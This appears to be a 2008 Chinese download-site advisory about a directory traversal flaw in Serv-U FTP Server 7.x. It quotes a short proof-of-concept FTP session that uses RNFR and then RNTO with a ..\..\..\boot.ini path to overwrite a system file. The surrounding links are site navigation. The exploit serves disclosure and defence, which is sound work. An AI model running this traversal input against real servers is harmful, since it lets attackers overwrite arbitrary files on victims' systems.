上一篇: 深陷“免费”陷阱 瑞星推出更多免费优惠
下一篇: 6个月有效期金山毒霸2008通行证
本类排行 本类推荐Serv-U FTP Server 7到7.3 出现目录遍历漏洞
作者: 来源: 点击: 日期:2008-10-20 14:38:58
Serv-U FTP Server <= 7.3 有一个目录遍历漏洞,可以覆盖系统上的任意文件,利用这个漏洞必须有一个upload权限的账号。不清楚哪个版本开始支持rnfr 和 rnto 的命令,官方还没有补丁,建议用Serv-U FTP Server的同学改用其他FTP Server程序或者用低版本的。
| 漏洞利用过程: #Serv-U 7.2.0.1 ftp file replacement #user must have upload permissions # #(x) dmnt 2008-10-01 220 Serv-U FTP Server v7.2 ready... user test 331 User name okay, need password. pass test 230 User logged in, proceed. rnfr any_exist_file.ext 350 File or directory exists, ready for destination name. rnto ..\..\..\boot.ini 250 RNTO command successful. #boot.ini rewrited |
相关软件- 1. windows特殊目录查看工具:SpecialFoldersView V1.05 汉...
- 2. 江民IE70DAY漏洞补丁程序 V1.0.0.0 简体中文绿色版(XM...
- 3. Xlight FTP 服务器(Xlight FTP Server Professional) v...
- 4. 360安全卫士系统漏洞修复程序 V1.0 圣盾防御绿色版
- 5. Home Web Server(简单易用的网络服务器) V1.4.3.117 ...
- 6. Http File Server(架设个人HTTP虚拟档案服务器) V2.30 ...
- 7. 光华系统漏洞修护工具 Bulid V1201 绿色版
- 8. ms sqlserver数据恢复:LogExplore 安装版
- 9. 1st SMTP Server(替代ISP的SMTP服务器) 绿色版
- 10. Mssql数据库恢复修复工具(SQL SERVER)
Serv-U FTP Server 7到7.3 出现目录遍历漏洞 评论
因为创意 成就无限! ┆ 创e下载:下载绿色!(闽ICP备05030653号)
Copyright © 2004-2008 7eDown.Com. All Rights Reserved .By 中国.福建